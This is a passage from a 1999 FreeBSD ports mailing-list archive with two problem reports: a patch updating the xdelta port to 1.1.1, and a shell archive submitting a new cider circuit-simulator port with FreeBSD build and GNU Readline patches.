- jim -- - jim mock - walnut creek cdrom/freebsd test labs - jim@cdrom.com - - phone: 925.691.2800 x3814 - fax: 925.674.0821 - jim@FreeBSD.org - - freebsdzine - http://www.freebsdzine.org/ - jim@freebsdzine.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 10:20: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9A56C14D4B for ; Mon, 13 Dec 1999 10:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA07433; Mon, 13 Dec 1999 10:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id A339F151DA; Mon, 13 Dec 1999 10:14:46 -0800 (PST) Message-Id: <19991213181446.A339F151DA@hub.freebsd.org> Date: Mon, 13 Dec 1999 10:14:46 -0800 (PST) From: c9710216@atlas.newcastle.edu.au To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15461: Update of misc/xdelta port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15461 >Category: ports >Synopsis: Update of misc/xdelta port >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 10:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Jacob A. Hart >Release: 4.0-CURRENT >Organization: >Environment: >Description: Updates xdelta-1.0.2 to xdelta-1.1.1 >How-To-Repeat: >Fix: Apply this patch: diff -ruN xdelta.old/Makefile xdelta/Makefile --- xdelta.old/Makefile Mon Oct 18 16:46:00 1999 +++ xdelta/Makefile Tue Dec 14 06:01:54 1999 @@ -1,12 +1,12 @@ # New ports collection makefile for: xdelta -# Version required: 1.0.2 -# Date created: Sun May 4 21:40:06 CDT 1997 -# Whom: jmacd +# Version required: 1.1.1 +# Date created: Sun Dec 12 03:24:01 EST 1999 +# Whom: c9710216@atlas.newcastle .edu.au # # $FreeBSD: ports/misc/xdelta/Makefile,v 1.17 1999/10/09 18:42:10 vanilla Exp $ # -DISTNAME= xdelta-1.0.2 +DISTNAME= xdelta-1.1.1 CATEGORIES= misc MASTER_SITES= ftp://ftp.xcf.berkeley.edu/pub/xdelta/ diff -ruN xdelta.old/README.html xdelta/README.html --- xdelta.old/README.html Tue May 18 12:12:10 1999 +++ xdelta/README.html Tue Dec 14 05:55:33 1999 @@ -3,7 +3,7 @@

The FreeBSD Ports Collection ("misc/xdelta")


-

You are now in the directory for the port "misc/xdelta" (package name "xdelt a-1.0.2"). +

You are now in the directory for the port "misc/xdelta" (package name "xdelt a-1.1.1").

This is the one-line description for this port: diff -ruN xdelta.old/files/md5 xdelta/files/md5 --- xdelta.old/files/md5 Sat Feb 20 21:47:28 1999 +++ xdelta/files/md5 Tue Dec 14 05:55:33 1999 @@ -1 +1 @@ -MD5 (xdelta-1.0.2.tar.gz) = 6bce2909de2202189b531607af41e11a +MD5 (xdelta-1.1.1.tar.gz) = eb648e2ac0f281f6bd286860178892ad diff -ruN xdelta.old/pkg/PLIST xdelta/pkg/PLIST --- xdelta.old/pkg/PLIST Fri Sep 24 03:36:12 1999 +++ xdelta/pkg/PLIST Tue Dec 14 05:55:33 1999 @@ -1,15 +1,17 @@ bin/xdelta bin/xdelta-config -include/serializeio.h +bin/edsio-comp include/xdelta.h -include/xdser.h -@unexec install-info --delete %D/info/xdelta.info %D/info/dir -info/xdelta.info -@exec install-info %D/info/xdelta.info %D/info/dir -lib/libxdelta.a +include/xd_edsio.h +include/edsio.h +include/edsio_edsio.h +lib/libxdelta.so.2 lib/libxdelta.so -lib/libxdelta.so.1 +lib/libxdelta.a +lib/libedsio.so.0 +lib/libedsio.so +lib/libedsio.a @unexec /usr/bin/env OBJFORMAT=%%PORTOBJFORMAT%% /sbin/ldconfig -R -@exec /usr/bin/env OBJFORMAT=%%PORTOBJFORMAT%% /sbin/ldconfig -m %B share/aclocal/xdelta.m4 -@unexec rmdir %D/share/aclocal 2>/dev/null || true +@unexec install-info --delete %D/info/xdelta.info %D/info/dir +info/xdelta.info >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Dec 13 10:20:57 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 399E8151A5 for ; Mon, 13 Dec 1999 10:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA07442; Mon, 13 Dec 1999 10:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from puce.csi.cam.ac.uk (puce.csi.cam.ac.uk [131.111.8.40]) by hub.freebsd.org (Postfix) with ESMTP id 5917E14E5C for ; Mon, 13 Dec 1999 10:19:20 -0800 (PST) (envelope-from sa264@phy.cam.ac.uk) Received: from yamame.phy.cam.ac.uk ([131.111.79.201]) by puce.csi.cam.ac.uk with esmtp (Exim 3.03 #1) id 11xa46-0004X9-00 for FreeBSD-gnats-submit@freebsd.org; Mon, 13 Dec 1999 18:19:18 +0000 Received: (from sa264@localhost) by yamame.phy.cam.ac.uk (8.9.3/3.7W) id SAA26142; Mon, 13 Dec 1999 18:19:16 GMT Message-Id: <199912131819.SAA26142@yamame.phy.cam.ac.uk> Date: Mon, 13 Dec 1999 18:19:16 GMT From: AMAKAWA Shuhei Reply-To: sa264@phy.cam.ac.uk To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15462: New port: cad/cider Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15462 >Category: ports >Synopsis: New port: cad/cider >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Dec 13 10:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: AMAKAWA Shuhei >Release: FreeBSD 3.3-RELEASE i386 >Organization: University of Cambridge >Environment: FreeBSD 3.3-RELEASE i386 >Description: A mixed-level circuit & device simulator developed at UCB. Includes SPICE3. >How-To-Repeat: Shar file attached below. >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # cider # cider/Makefile # cider/files # cider/files/md5 # cider/files/FreeBSD # cider/files/Makefile # cider/files/Makefile.spice # cider/files/Makefile.cider # cider/patches # cider/patches/patch-ab # cider/patches/patch-bc # cider/patches/patch-bd # cider/patches/patch-ba # cider/patches/patch-aa # cider/patches/patch-be # cider/patches/patch-ad # cider/patches/patch-bf # cider/patches/patch-bg # cider/patches/patch-ae # cider/patches/patch-af # cider/patches/patch-ag # cider/patches/patch-ah # cider/patches/patch-ai # cider/patches/patch-ac # cider/patches/patch-bb # cider/pkg # cider/pkg/COMMENT # cider/pkg/DESCR # cider/pkg/PLIST # cider/scripts # cider/scripts/configure # echo c - cider mkdir -p cider > /dev/null 2>&1 echo x - cider/Makefile sed 's/^X//' >cider/Makefile << 'END-of-cider/Makefile' X# New ports collection makefile for: cider X# Version required: 1b1 X# Date created: 1999-12-12 X# Whom: AMAKAWA Shuhei X# X# $FreeBSD$ X# X XDISTNAME= cider1b1 XPKGNAME= cider-1b1 XCATEGORIES= cad XMASTER_SITES= ftp://ic.eecs.berkeley.edu/pub/Cider/new/ XEXTRACT_SUFX= .tar.Z X XMAINTAINER= amakawa@jp.FreeBSD.org X XUSE_XLIB= yes XNO_WRKSUBDIR= yes XMAN1= sconvert.1 nutmeg.1 spice.1 cider.1 XMAN3= mfb.3 XMAN5= mfbcap.5 XMLINKS= spice.1 spice3.1 X Xpre-patch: X ${CP} -f ${WRKSRC}/sim/spice/common/lib/helpdir/spice.txt ${WRKSRC}/sim/cider/common/lib/helpdir/spice.txt X Xpost-install: X.if !defined(NOPORTDOCS) X ${MKDIR} ${PREFIX}/share/examples/spice3 X ${INSTALL_DATA} ${WRKSRC}/sim/spice/common/examples/*.cir ${PREFIX}/share/examples/spice3 X ${MKDIR} ${PREFIX}/share/examples/cider X ${TAR} -cf - -C ${WRKSRC}/sim/cider/common/examples . | ${TAR} -xf - -C ${PREFIX}/share/examples/cider X ${CHOWN} -R ${SHAREOWN}:${SHAREGRP} ${PREFIX}/share/examples/cider X ${LN} -fs ${PREFIX}/share/spice3/scripts/spinit ${PREFIX}/share/cider/scripts X.endif X X.include END-of-cider/Makefile echo c - cider/files mkdir -p cider/files > /dev/null 2>&1 echo x - cider/files/md5 sed 's/^X//' >cider/files/md5 << 'END-of-cider/files/md5' XMD5 (cider1b1.tar.Z) = e14186af9e839d310ea5dd38e58044d5 END-of-cider/files/md5 echo x - cider/files/FreeBSD sed 's/^X//' >cider/files/FreeBSD << 'END-of-cider/files/FreeBSD' X# FreeBSD config exception file X XMAKE = /usr/bin/make XINTERFACE_OPTS = -DWANT_X11 XCC_OPT = -O2 -DHAS_GNUREADLINE -pipe XCC_OPT_SAFE = -O -DHAS_GNUREADLINE -pipe XX_DIR = $(X11BASE) XLDFLAGS = -L$(X11BASE)/lib -lreadline -lm -ltermcap XASM_HACK = < /dev/null XSYS_CFLAGS = -Dbsd END-of-cider/files/FreeBSD echo x - cider/files/Makefile sed 's/^X//' >cider/files/Makefile << 'END-of-cider/files/Makefile' Xall: X (cd sim/spice/common && make) X (cd sim/cider/common && make) X Xinstall: X (cd sim/spice/common && make install) X (cd sim/cider/common && make install) END-of-cider/files/Makefile echo x - cider/files/Makefile.spice sed 's/^X//' >cider/files/Makefile.spice << 'END-of-cider/files/Makefile.spice' Xall: X ./util/build FreeBSD default X Xinstall: X ./util/build FreeBSD install X chmod a+rx ${PREFIX}/bin/spice3 ${PREFIX}/bin/nutmeg \ X ${PREFIX}/bin/sconvert ${PREFIX}/bin/help \ X ${PREFIX}/bin/proc2mod ${PREFIX}/bin/multidec X strip ${PREFIX}/bin/spice3 ${PREFIX}/bin/nutmeg \ X ${PREFIX}/bin/sconvert ${PREFIX}/bin/help \ X ${PREFIX}/bin/proc2mod ${PREFIX}/bin/multidec X chmod -R a+rX ${PREFIX}/share/spice3 X install -c -m 644 -o bin -g bin man/man5/mfbcap.5 ${PREFIX}/man/man5/mfbcap.5 X install -c -m 644 -o bin -g bin man/man1/sconvert.1 ${PREFIX}/man/man1/sconvert.1 X install -c -m 644 -o bin -g bin man/man1/nutmeg.1 ${PREFIX}/man/man1/nutmeg.1 X install -c -m 644 -o bin -g bin man/man1/spice.1 ${PREFIX}/man/man1/spice.1 X install -c -m 644 -o bin -g bin man/man3/mfb.3 ${PREFIX}/man/man3/mfb.3 END-of-cider/files/Makefile.spice echo x - cider/files/Makefile.cider sed 's/^X//' >cider/files/Makefile.cider << 'END-of-cider/files/Makefile.cider' Xall: X ./util/build FreeBSD X Xinstall: X ./util/build FreeBSD install X chmod a+rx ${PREFIX}/bin/cider X strip ${PREFIX}/bin/cider X chmod -R a+rX ${PREFIX}/share/cider X install -c -m 644 -o bin -g bin doc/cider.1 ${PREFIX}/man/man1/cider.1 END-of-cider/files/Makefile.cider echo c - cider/patches mkdir -p cider/patches > /dev/null 2>&1 echo x - cider/patches/patch-ab sed 's/^X//' >cider/patches/patch-ab << 'END-of-cider/patches/patch-ab' X*** sim/spice/common/src/lib/fte/resource.c.orig Sat Jan 29 18:48:28 1994 X--- sim/spice/common/src/lib/fte/resource.c Sun Dec 12 14:38:33 1999 X*************** X*** 370,376 **** X--- 370,378 ---- X long x; X SIGNAL_TYPE (*orig_signal)( ); X X+ #ifndef __FreeBSD__ X if (getenv("SPICE_NO_DATASEG_CHECK")) X+ #endif X return 0; X X low = 0; X*** sim/spice/common/src/include/misc.h.orig Sat Jan 29 19:14:17 1994 X--- sim/spice/common/src/include/misc.h Sun Dec 12 14:38:33 1999 X*************** X*** 86,92 **** X--- 86,94 ---- X extern char *realloc(); X extern char *getenv(); X extern int errno; X+ #ifndef __FreeBSD__ X extern char *sys_errlist[]; X+ #endif X extern char *getenv(); X extern char *getwd(); X extern int rand(); X*************** X*** 109,120 **** X--- 111,124 ---- X # endif /* clearerr */ X # endif /* HAS_CLEARERR */ X X+ #ifndef __FreeBSD__ X # ifndef bzero X extern int bzero(); X # endif X # ifndef bcopy X extern void bcopy(); X # endif X+ #endif /* __FreeBSD__ */ X X # ifndef index X # ifdef HAS_INDEX X*** sim/spice/common/src/include/os_bsd.h.orig Sat Jan 29 19:14:37 1994 X--- sim/spice/common/src/include/os_bsd.h Sun Dec 12 14:38:33 1999 X*************** X*** 8,19 **** X X #include "os_unix.h" X X #define HAS_NO_ATRIGH_DECL /* if asinh( ) is not in math.h */ X- #define HAS_ATRIGH /* acosh( ), asinh( ), atanh( ) */ X #define HAS_FTIME /* ftime( ), */ X #define HAS_TERMCAP /* tgetxxx( ) */ X #define HAS_VFORK /* BSD-ism, should not be necessary */ X- #define HAS_INDEX /* index( ) instead of strchr( ) */ X #define HAS_BCOPY /* bcopy( ), bzero( ) */ X #define HAS_BSDRANDOM /* srandom( ) and random( ) */ X #define HAS_BSDTTY /* */ X--- 8,23 ---- X X #include "os_unix.h" X X+ #ifndef __FreeBSD__ X #define HAS_NO_ATRIGH_DECL /* if asinh( ) is not in math.h */ X #define HAS_FTIME /* ftime( ), */ X+ #define HAS_INDEX /* index( ) instead of strchr( ) */ X+ #define HAS_STRINGS /* use instead of */ X+ #endif X+ X+ #define HAS_ATRIGH /* acosh( ), asinh( ), atanh( ) */ X #define HAS_TERMCAP /* tgetxxx( ) */ X #define HAS_VFORK /* BSD-ism, should not be necessary */ X #define HAS_BCOPY /* bcopy( ), bzero( ) */ X #define HAS_BSDRANDOM /* srandom( ) and random( ) */ X #define HAS_BSDTTY /* */ X*************** X*** 22,25 **** X #define HAS_BSDRLIMIT /* getrlimit( ) */ X #define HAS_DUP2 X #define HAS_GETWD /* getwd(buf) */ X! #define HAS_STRINGS /* use instead of */ X--- 26,35 ---- X #define HAS_BSDRLIMIT /* getrlimit( ) */ X #define HAS_DUP2 X #define HAS_GETWD /* getwd(buf) */ X! X! #ifdef __FreeBSD__ X! #define HAS_BSDSOCKETS /* , socket( ), etc. */ X! #define HAS_BSDTIME /* gettimeofday( ) return time */ X! #define HAS_FLOAT_H /* float.h */ X! #define HAS_STRCHR /* strchr( ) instead of index( ) */ X! #endif END-of-cider/patches/patch-ab echo x - cider/patches/patch-bc sed 's/^X//' >cider/patches/patch-bc << 'END-of-cider/patches/patch-bc' X*** sim/cider/common/src/bin/main.c.orig Sat Mar 12 08:20:59 1994 X--- sim/cider/common/src/bin/main.c Mon Dec 13 10:16:13 1999 X*************** X*** 25,30 **** X--- 25,37 ---- X #include X #endif X X+ #ifdef HAS_GNUREADLINE X+ /* Added GNU Readline Support 11/3/97 -- Andrew Veliath */ X+ #include X+ #include X+ #include "fteinput.h" X+ #endif X+ X #ifdef HAS_UNIX_SIGS X #include X #endif X*************** X*** 36,41 **** X--- 43,53 ---- X #endif X X #include "patchlev.h" X+ X+ #ifdef __FreeBSD__ X+ #include X+ #endif X+ X #include "suffix.h" X X /* (Virtual) Machine architecture parameters */ X*************** X*** 53,58 **** X--- 65,75 ---- X bool ft_intrpt = false; /* Set by the (void) signal handlers. */ X bool ft_setflag = false; /* Don't abort after an interrupt. */ X X+ #ifdef HAS_GNUREADLINE X+ char gnu_history_file[512]; X+ static char *application_name; X+ #endif X+ X struct variable *(*if_getparam)( ); X X #ifdef BATCH X*************** X*** 185,190 **** X--- 202,291 ---- X X #endif X X+ #ifdef HAS_GNUREADLINE X+ /* Adapted ../lib/cp/lexical.c:prompt() for GNU Readline -- Andrew Veliath */ X+ static char * X+ prompt() X+ { X+ static char pbuf[128]; X+ char *p = pbuf, *s; X+ X+ if (cp_interactive == false) X+ return; X+ if (cp_promptstring == NULL) X+ s = "-> "; X+ else X+ s = cp_promptstring; X+ if (cp_altprompt) X+ s = cp_altprompt; X+ while (*s) { X+ switch (strip(*s)) { X+ case '!': X+ p += sprintf(p, "%d", where_history() + 1); X+ break; X+ case '\\': X+ if (*(s + 1)) X+ p += sprintf(p, "%c", strip(*++s)); X+ default: X+ *p = strip(*s); ++p; X+ break; X+ } X+ s++; X+ } X+ *p = 0; X+ return pbuf; X+ } X+ X+ /* Process device events in Readline's hook since there is no where X+ else to do it now - AV */ X+ int rl_event_func() X+ { X+ static REQUEST reqst = { checkup_option, 0 }; X+ Input(&reqst, NULL); X+ return 0; X+ } X+ X+ /* Added GNU Readline Support -- Andrew Veliath */ X+ void app_rl_readlines() X+ { X+ char *line, *expanded_line; X+ X+ strcpy(gnu_history_file, getenv("HOME")); X+ strcat(gnu_history_file, "/."); X+ strcat(gnu_history_file, application_name); X+ strcat(gnu_history_file, "_history"); X+ X+ using_history(); X+ read_history(gnu_history_file); X+ X+ rl_readline_name = application_name; X+ rl_instream = cp_in; X+ rl_outstream = cp_out; X+ rl_event_hook = rl_event_func; X+ X+ while (1) { X+ history_set_pos(history_length); X+ line = readline(prompt()); X+ if (line && *line) { X+ int s = history_expand(line, &expanded_line); X+ X+ if (s == 2) { X+ fprintf(stderr, "-> %s\n", expanded_line); X+ } else if (s == -1) { X+ fprintf(stderr, "readline: %s\n", expanded_line); X+ } else { X+ cp_evloop(expanded_line); X+ add_history(expanded_line); X+ } X+ free(expanded_line); X+ } X+ if (line) free(line); X+ else if (line == NULL) cp_evloop("quit"); X+ } X+ /* History gets written in ../fte/misccoms.c com_quit */ X+ } X+ #endif /* HAS_GNUREADLINE */ X+ X char *hlp_filelist[] = { "spice", "cider", 0 }; X X void X*************** X*** 216,221 **** X--- 317,326 ---- X X #endif X X+ #ifdef __FreeBSD__ X+ fpsetmask(fpgetmask() & ~FP_X_INV & ~FP_X_DZ & ~FP_X_OFL); X+ #endif X+ X /* MFB tends to jump to 0 on errors. This tends to catch it. */ X if (started) { X fprintf(cp_err, "main: Internal Error: jump to zero\n"); X*************** X*** 236,241 **** X--- 341,353 ---- X ARCHsize = 1; X #endif /* PARALLEL_ARCH */ X X+ #ifdef HAS_GNUREADLINE X+ if (!(application_name = strrchr(av[0],'/'))) X+ application_name = av[0]; X+ else X+ ++application_name; X+ #endif X+ X #ifdef HAS_MAC_ARGCARGV X ac = initmac(&av); X #endif X*************** X*** 472,478 **** X--- 584,594 ---- X # ifdef HAS_UNIX_SIGS X /* Set up (void) signal handling */ X if (!ft_batchmode) { X+ # ifdef HAS_GNUREADLINE X+ (void) signal(SIGINT, SIG_IGN); X+ # else X (void) signal(SIGINT, ft_sigintr); X+ # endif X (void) signal(SIGFPE, sigfloat); X # ifdef SIGTSTP X (void) signal(SIGTSTP, sigstop); X*************** X*** 668,674 **** X--- 784,794 ---- X } else { X (void) setjmp(jbuf); X cp_interactive = true; X+ #ifdef HAS_GNUREADLINE X+ app_rl_readlines(); X+ #else X while (cp_evloop((char *) NULL) == 1) ; X+ #endif /* ifelse HAS_GNUREADLINE */ X } X X # else /* if BATCH */ X*************** X*** 708,714 **** X--- 828,838 ---- X /* Nutmeg "main" */ X (void) setjmp(jbuf); X cp_interactive = true; X+ #ifdef HAS_GNUREADLINE X+ app_rl_readlines(); X+ #else X while (cp_evloop((char *) NULL) == 1) ; X+ #endif /* ifelse HAS_GNUREADLINE */ X X #endif X END-of-cider/patches/patch-bc echo x - cider/patches/patch-bd sed 's/^X//' >cider/patches/patch-bd << 'END-of-cider/patches/patch-bd' X*** sim/cider/common/src/lib/spiceitf/resource.c.orig Sun Jan 30 01:19:49 1994 X--- sim/cider/common/src/lib/spiceitf/resource.c Sun Dec 12 18:18:26 1999 X*************** X*** 379,385 **** X--- 379,387 ---- X long x; X SIGNAL_TYPE (*orig_signal)( ); X X+ #ifndef __FreeBSD__ X if (getenv("SPICE_NO_DATASEG_CHECK")) X+ #endif X return 0; X X low = 0; END-of-cider/patches/patch-bd echo x - cider/patches/patch-ba sed 's/^X//' >cider/patches/patch-ba << 'END-of-cider/patches/patch-ba' X*** sim/cider1b1/common/conf/defaults.orig Sat Jan 29 19:21:15 1994 X--- sim/cider1b1/common/conf/defaults Sun Dec 12 14:14:43 1999 X*************** X*** 99,115 **** X # identified as and SYSTEM is the name of the per-system definitions X # file listed in the "build" command. X X! SIM_DIR = $(TOP2) X! SPICE_DIR = $(SIM_DIR)/spice/$(SYSTEM) X! CIDER_DIR = $(SIM_DIR)/cider/$(SYSTEM) X! SPICE_LIB_DIR = $(SPICE_DIR)/lib X! CIDER_LIB_DIR = $(SPICE_DIR)/lib X SPICE_EXEC_DIR = $(SPICE_DIR)/bin X CIDER_EXEC_DIR = $(CIDER_DIR)/bin X X S_CIDER_DIR = $(CIDER_DIR) X S_SPICE_DIR = $(SPICE_DIR) X! S_CIDER_LIB_DIR = $(S_SPICE_DIR)/lib X S_CIDER_EXEC_DIR= $(S_CIDER_DIR)/bin X X # INSTALL_DIRS lists the directories that need to be created before X--- 99,115 ---- X # identified as and SYSTEM is the name of the per-system definitions X # file listed in the "build" command. X X! SIM_DIR = ${PREFIX} X! SPICE_DIR = $(SIM_DIR) X! CIDER_DIR = $(SIM_DIR) X! SPICE_LIB_DIR = $(SPICE_DIR)/share/spice3 X! CIDER_LIB_DIR = $(SPICE_DIR)/share/cider X SPICE_EXEC_DIR = $(SPICE_DIR)/bin X CIDER_EXEC_DIR = $(CIDER_DIR)/bin X X S_CIDER_DIR = $(CIDER_DIR) X S_SPICE_DIR = $(SPICE_DIR) X! S_CIDER_LIB_DIR = $(S_SPICE_DIR)/share/cider X S_CIDER_EXEC_DIR= $(S_CIDER_DIR)/bin X X # INSTALL_DIRS lists the directories that need to be created before END-of-cider/patches/patch-ba echo x - cider/patches/patch-aa sed 's/^X//' >cider/patches/patch-aa << 'END-of-cider/patches/patch-aa' X*** sim/spice/common/conf/defaults.orig Sat Jan 29 19:15:53 1994 X--- sim/spice/common/conf/defaults Sun Dec 12 14:40:09 1999 X*************** X*** 105,116 **** X # identified as and SYSTEM is the name of the per-system definitions X # file listed on the "build" command line. X X! SPICE_DIR = $(TOP1)/$(SYSTEM) X! SPICE_LIB_DIR = $(SPICE_DIR)/lib X SPICE_EXEC_DIR = $(SPICE_DIR)/bin X X S_SPICE_DIR = $(SPICE_DIR) X! S_SPICE_LIB_DIR = $(S_SPICE_DIR)/lib X S_SPICE_EXEC_DIR= $(S_SPICE_DIR)/bin X X # INSTALL_DIRS lists the directories that need to be created before X--- 105,116 ---- X # identified as and SYSTEM is the name of the per-system definitions X # file listed on the "build" command line. X X! SPICE_DIR = ${PREFIX} X! SPICE_LIB_DIR = $(SPICE_DIR)/share/spice3 X SPICE_EXEC_DIR = $(SPICE_DIR)/bin X X S_SPICE_DIR = $(SPICE_DIR) X! S_SPICE_LIB_DIR = $(S_SPICE_DIR)/share/spice3 X S_SPICE_EXEC_DIR= $(S_SPICE_DIR)/bin X X # INSTALL_DIRS lists the directories that need to be created before X*** sim/spice/common/util/build.orig Sat Jan 29 19:16:26 1994 X--- sim/spice/common/util/build Sun Dec 12 14:38:33 1999 X*************** X*** 96,102 **** X X TMP_LEADER="${TMP_DIR}/buildl$$" X TMP_TRAILER="${TMP_DIR}/buildt$$" X! trap 'rm -f ${TMP_LEADER} ${TMP_TRAILER}; exit 1' 1 2 3 4 6 7 8 9 10 12 13 14 15 X echo > "${TMP_TRAILER}" X BAD=false X DEBUG= X--- 96,102 ---- X X TMP_LEADER="${TMP_DIR}/buildl$$" X TMP_TRAILER="${TMP_DIR}/buildt$$" X! trap 'rm -f ${TMP_LEADER} ${TMP_TRAILER}; exit 1' 1 2 3 4 6 7 8 10 12 13 14 15 X echo > "${TMP_TRAILER}" X BAD=false X DEBUG= END-of-cider/patches/patch-aa echo x - cider/patches/patch-be sed 's/^X//' >cider/patches/patch-be << 'END-of-cider/patches/patch-be' X*** sim/cider/common/lib/makedefs.orig Thu Feb 24 09:11:21 1994 X--- sim/cider/common/lib/makedefs Mon Dec 13 11:34:56 1999 X*************** X*** 1,9 **** X X INSTALL_TARGETS = $(CIDER_LIB_DIR)/helpdir/cider.txt \ X $(CIDER_LIB_DIR)/helpdir/cider.idx \ X $(CIDER_LIB_DIR)/scripts/devaxis \ X $(CIDER_LIB_DIR)/scripts/devload X X! ALL_INSTALL_DIRS = $(CIDER_LIB_DIR) $(CIDER_LIB_DIR)/helpdir X X INSTALL_SPECIAL = directories X--- 1,12 ---- X X INSTALL_TARGETS = $(CIDER_LIB_DIR)/helpdir/cider.txt \ X $(CIDER_LIB_DIR)/helpdir/cider.idx \ X+ $(CIDER_LIB_DIR)/helpdir/spice.txt \ X+ $(CIDER_LIB_DIR)/helpdir/spice.idx \ X $(CIDER_LIB_DIR)/scripts/devaxis \ X $(CIDER_LIB_DIR)/scripts/devload X X! ALL_INSTALL_DIRS = $(CIDER_LIB_DIR) $(CIDER_LIB_DIR)/helpdir \ X! $(CIDER_LIB_DIR)/scripts X X INSTALL_SPECIAL = directories END-of-cider/patches/patch-be echo x - cider/patches/patch-ad sed 's/^X//' >cider/patches/patch-ad << 'END-of-cider/patches/patch-ad' X*** sim/spice/common/src/bin/main.c.orig Sat Mar 12 08:22:28 1994 X--- sim/spice/common/src/bin/main.c Sun Dec 12 14:58:04 1999 X*************** X*** 25,30 **** X--- 25,37 ---- X #include X #endif X X+ #ifdef HAS_GNUREADLINE X+ /* Added GNU Readline Support 11/3/97 -- Andrew Veliath */ X+ #include X+ #include X+ #include "fteinput.h" X+ #endif X+ X #ifdef HAS_UNIX_SIGS X #include X #endif X*************** X*** 36,41 **** X--- 43,53 ---- X #endif X X #include "patchlev.h" X+ X+ #ifdef __FreeBSD__ X+ #include X+ #endif X+ X #include "suffix.h" X X /* (Virtual) Machine architecture parameters */ X*************** X*** 53,58 **** X--- 65,75 ---- X bool ft_intrpt = false; /* Set by the (void) signal handlers. */ X bool ft_setflag = false; /* Don't abort after an interrupt. */ X X+ #ifdef HAS_GNUREADLINE X+ char gnu_history_file[512]; X+ static char *application_name; X+ #endif X+ X struct variable *(*if_getparam)( ); X X #ifdef BATCH X*************** X*** 185,190 **** X--- 202,291 ---- X X #endif X X+ #ifdef HAS_GNUREADLINE X+ /* Adapted ../lib/cp/lexical.c:prompt() for GNU Readline -- Andrew Veliath */ X+ static char * X+ prompt() X+ { X+ static char pbuf[128]; X+ char *p = pbuf, *s; X+ X+ if (cp_interactive == false) X+ return; X+ if (cp_promptstring == NULL) X+ s = "-> "; X+ else X+ s = cp_promptstring; X+ if (cp_altprompt) X+ s = cp_altprompt; X+ while (*s) { X+ switch (strip(*s)) { X+ case '!': X+ p += sprintf(p, "%d", where_history() + 1); X+ break; X+ case '\\': X+ if (*(s + 1)) X+ p += sprintf(p, "%c", strip(*++s)); X+ default: X+ *p = strip(*s); ++p; X+ break; X+ } X+ s++; X+ } X+ *p = 0; X+ return pbuf; X+ } X+ X+ /* Process device events in Readline's hook since there is no where X+ else to do it now - AV */ X+ int rl_event_func() X+ { X+ static REQUEST reqst = { checkup_option, 0 }; X+ Input(&reqst, NULL); X+ return 0; X+ } X+ X+ /* Added GNU Readline Support -- Andrew Veliath */ X+ void app_rl_readlines() X+ { X+ char *line, *expanded_line; X+ X+ strcpy(gnu_history_file, getenv("HOME")); X+ strcat(gnu_history_file, "/."); X+ strcat(gnu_history_file, application_name); X+ strcat(gnu_history_file, "_history"); X+ X+ using_history(); X+ read_history(gnu_history_file); X+ X+ rl_readline_name = application_name; X+ rl_instream = cp_in; X+ rl_outstream = cp_out; X+ rl_event_hook = rl_event_func; X+ X+ while (1) { X+ history_set_pos(history_length); X+ line = readline(prompt()); X+ if (line && *line) { X+ int s = history_expand(line, &expanded_line); X+ X+ if (s == 2) { X+ fprintf(stderr, "-> %s\n", expanded_line); X+ } else if (s == -1) { X+ fprintf(stderr, "readline: %s\n", expanded_line); X+ } else { X+ cp_evloop(expanded_line); X+ add_history(expanded_line); X+ } X+ free(expanded_line); X+ } X+ if (line) free(line); X+ else if (line == NULL) cp_evloop("quit"); X+ } X+ /* History gets written in ../fte/misccoms.c com_quit */ X+ } X+ #endif /* HAS_GNUREADLINE */ X+ X char *hlp_filelist[] = { "spice", 0 }; X X void X*************** X*** 216,221 **** X--- 317,326 ---- X X #endif X X+ #ifdef __FreeBSD__ X+ fpsetmask(fpgetmask() & ~FP_X_INV & ~FP_X_DZ & ~FP_X_OFL); X+ #endif X+ X /* MFB tends to jump to 0 on errors. This tends to catch it. */ X if (started) { X fprintf(cp_err, "main: Internal Error: jump to zero\n"); X*************** X*** 236,241 **** X--- 341,353 ---- X ARCHsize = 1; X #endif /* PARALLEL_ARCH */ X X+ #ifdef HAS_GNUREADLINE X+ if (!(application_name = strrchr(av[0],'/'))) X+ application_name = av[0]; X+ else X+ ++application_name; X+ #endif X+ X #ifdef HAS_MAC_ARGCARGV X ac = initmac(&av); X #endif X*************** X*** 472,478 **** X--- 584,594 ---- X # ifdef HAS_UNIX_SIGS X /* Set up (void) signal handling */ X if (!ft_batchmode) { X+ # ifdef HAS_GNUREADLINE X+ (void) signal(SIGINT, SIG_IGN); X+ # else X (void) signal(SIGINT, ft_sigintr); X+ # endif X (void) signal(SIGFPE, sigfloat); X # ifdef SIGTSTP X (void) signal(SIGTSTP, sigstop); 